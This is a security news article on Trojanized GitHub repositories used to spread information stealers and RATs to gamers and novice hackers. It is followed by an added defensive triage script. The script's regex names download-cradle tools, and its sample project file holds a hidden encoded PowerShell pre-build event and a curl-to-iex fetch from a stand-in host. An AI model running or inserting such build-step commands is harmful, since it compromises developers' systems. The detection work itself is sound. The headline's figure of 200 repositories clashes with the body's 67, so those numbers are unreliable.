More than 200 Trojanized GitHub repositories found in a campaign targeting gamers and developers


Cybersecurity researchers have uncovered a new campaign in which more than 67 GitHub repositories claim to offer Python-based hacking tools but instead deliver Trojanized payloads.

The activity, codenamed Banana Squad by ReversingLabs, saw more than 75,000 downloads in 2023 and is assessed to be a continuation of the rogue Python campaign that targeted the Python Package Index (PyPI) repository with bogus packages carrying information-stealing capabilities on Windows systems.

The findings build on a previous report from SANS's Internet Storm Center in November 2024, which detailed a "Steam-Account-Checker" tool hosted on GitHub. The tool incorporated stealthy features to download malicious code that harvested data from the Exodus cryptocurrency wallet app.

Further analysis of the repositories and the attacker-controlled infrastructure uncovered 67 Trojanized GitHub repositories impersonating benign repositories of the same name.

There is evidence to suggest that users searching for software such as account cleaning tools, Discord account cleaners, Fortnite external cheats, TikTok username checkers, PayPal bulk account checkers, and game cheats are the targets of the campaign. All identified repositories have since been taken down by GitHub.

“Backdoors and Trojanized code in public source code repositories like GitHub are becoming more common and represent a growing software supply chain attack vector.”

“For developers who rely on these open source platforms, it’s essential to always confirm that the repositories they use contain what they actually expect.”

GitHub as a malware distribution service

The development comes as GitHub is increasingly becoming the focus of several campaigns that use it as a malware delivery vector. Earlier this week, Trend Micro said it had discovered 76 malicious GitHub repositories run by a threat actor tracked as Water Curse to deliver multi-stage malware.


These payloads are designed to siphon credentials, browser data, and session tokens, giving threat actors persistent remote access to compromised systems.

Check Point then shed light on another campaign that used a criminal service known as the Stargazers Ghost Network to target Minecraft users with Java-based malware. The Stargazers Ghost Network refers to a collection of GitHub accounts that propagate malware or malicious links through phishing repositories.

“The network consists of multiple accounts that distribute malicious links and malware and perform other actions, such as starring, forking, or subscribing to malicious repositories.”

The cybersecurity company also assessed that such GitHub “ghost” accounts are only part of the bigger picture, with other “ghost” accounts operating on different platforms as an integral part of a larger distribution-as-a-service universe.

Several aspects of the Stargazers Ghost Network were documented by Checkmarx in April 2024, which described a pattern of threat actors using fake stars and pushing out frequent updates to artificially inflate a repository’s popularity and ensure that it surfaces high in GitHub search results.

These repositories are cleverly disguised as legitimate projects related to popular games, cheats, cryptocurrency price trackers, and tools such as multiplier predictors for crash betting games.

These campaigns also dovetail with another attack wave targeting novice cybercriminals, luring them with seemingly readily available malware and attack tools on GitHub that are hosted in backdoored repositories and infect them with information stealers.

In one example highlighted by Sophos this month, a Trojanized Sakura RAT repository was found to incorporate malicious code that compromised those who compiled the malware on their systems with information stealers and other remote access trojans (RATs).


The identified repositories act as a conduit for four kinds of backdoors embedded in Visual Studio pre-build events, Python scripts, screensaver files, and JavaScript. These backdoors steal data, communicate via Telegram, and fetch additional payloads, including AsyncRAT, Remcos RAT and Lumma Stealer.

Overall, the cybersecurity company said it had detected over 133 backdoored repositories as part of the campaign, 111 of which contained the pre-build backdoor, with the others hosting Python, screensaver and JavaScript backdoors.

Sophos also noted that these activities are linked to a distribution-as-a-service operation that has been active since August 2022 and uses thousands of GitHub accounts to distribute malware embedded in Trojanized repositories, focusing on game cheats, exploits and attack tools.

The exact distribution method used in the campaign is unknown, but threat actors are also thought to rely on Discord servers and YouTube channels to spread links to Trojanized repositories.

“It remains unclear whether this campaign is directly linked to some or all of the previously reported campaigns, but the approach appears to be popular and effective and is likely to continue in some form,” Sophos said. “In the future, the focus may change and threat actors may target groups other than inexperienced cybercriminals and gamers who use cheats.”

Chet Wisniewski, director and field CISO at Sophos, told Hacker News there were “striking similarities” between the campaign and Water Curse. These include the following characteristics:

  • Repositories with “very similar names”
  • Extensive use of GitHub accounts
  • Similar focus on Electron applications
  • Similar abuse of Visual Studio pre-build events, and
  • References to the “ischhfd83” email address (“ischhfd83@rambler(.)ru”), which is used to make commits to the GitHub repositories
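As an added example (not code from Sophos, Trend Micro or any of the reports cited here), a small triage script for a freshly cloned repository that checks the two indicators listed above: Visual Studio pre-/post-build events that download or run code, and commits authored with the e-mail address named in the article. The project file, the `example.invalid` URL and the commit list are constructed samples.

```python
"""Triage a cloned repo for two indicators from the article: Visual Studio build events
that download or run code, and commits by a known-bad e-mail. Sample data is constructed."""
import re
import xml.etree.ElementTree as ET

# Indicator named in the article (defanged there as ischhfd83@rambler(.)ru).
KNOWN_BAD_EMAILS = {"ischhfd83@rambler.ru"}

# Download cradles, encoded PowerShell and bare URLs: the staged-loader pattern.
SUSPICIOUS = re.compile(
    r"(powershell|pwsh|-enc(odedcommand)?\b|\biex\b|invoke-expression|downloadstring|"
    r"\bcurl\b|\bwget\b|certutil|bitsadmin|mshta|https?://)",
    re.IGNORECASE,
)

def suspicious_build_events(csproj_xml: str) -> list:
    """Return (element, command) pairs whose command matches SUSPICIOUS.
    Covers classic <PreBuildEvent>/<PostBuildEvent> and SDK-style
    <Exec Command="..."/> inside a BeforeBuild/AfterBuild target."""
    hits = []
    for el in ET.fromstring(csproj_xml).iter():
        tag = el.tag.split("}")[-1]          # drop the MSBuild namespace, if any
        if tag in ("PreBuildEvent", "PostBuildEvent") and el.text:
            cmd = el.text.strip()
        elif tag == "Exec" and el.get("Command"):
            cmd = el.get("Command")
        else:
            continue
        if SUSPICIOUS.search(cmd):
            hits.append((tag, cmd))
    return hits

def commits_by_known_bad(commits) -> list:
    """commits: iterable of (sha, author_email) taken from `git log`; returns flagged shas."""
    return [sha for sha, email in commits if email.lower() in KNOWN_BAD_EMAILS]

# Constructed sample: a "game cheat" project with an encoded PowerShell pre-build
# cradle and a curl|iex BeforeBuild step, beside a harmless xcopy that must pass.
SAMPLE_CSPROJ = """<Project>
  <PropertyGroup>
    <PreBuildEvent>powershell -w hidden -enc QQBCAEMA</PreBuildEvent>
    <PostBuildEvent>xcopy "$(TargetDir)*.dll" "$(SolutionDir)bin\\" /Y</PostBuildEvent>
  </PropertyGroup>
  <Target Name="BeforeBuild"><Exec Command="curl -s https://example.invalid/x.ps1 | iex" /></Target>
</Project>"""
SAMPLE_COMMITS = [("a1b2c3", "dev@example.invalid"), ("d4e5f6", "ISCHHFD83@rambler.ru")]
if __name__ == "__main__":
    for tag, cmd in suspicious_build_events(SAMPLE_CSPROJ):
        print(f"[!] suspicious {tag}: {cmd}")
    print("[!] commits by known-bad author:", commits_by_known_bad(SAMPLE_COMMITS))
```

Run it against the `.csproj`/`.vcxproj` files and `git log --format='%H %ae'` output of a repository before building anything from it; a hit is a reason to read the build step, not proof of compromise.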

“Whether these campaigns are closely related or are part of a threat cluster that works from the same codebase and playbook deserves further investigation,” Wisniewski added.
